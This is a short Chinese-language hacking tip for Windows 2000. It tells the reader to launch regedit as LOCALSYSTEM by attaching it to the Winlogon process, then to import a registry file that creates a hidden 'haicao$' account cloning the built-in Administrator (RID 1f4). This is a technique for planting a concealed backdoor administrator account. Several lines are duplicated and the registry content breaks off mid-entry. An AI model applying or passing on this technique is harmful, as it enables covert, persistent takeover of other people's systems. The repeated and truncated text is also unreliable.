1、命令:psu -p regedit -i pid
其中pid是Winlogon的PID
这样就可以以LOCALSYSTEM权限运行。
2、
先用下面的1f4改为要克隆的帐户的PID,WIN2KG下直接在任务管理器下就可以看到。
然后把以下内容保存为一REG文件然后导入。
其中pid是Winlogon的PID
这样就可以以LOCALSYSTEM权限运行。
2、
先用下面的1f4改为要克隆的帐户的PID,WIN2KG下直接在任务管理器下就可以看到。
然后把以下内容保存为一REG文件然后导入。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\haicao$]
@=hex(1f4):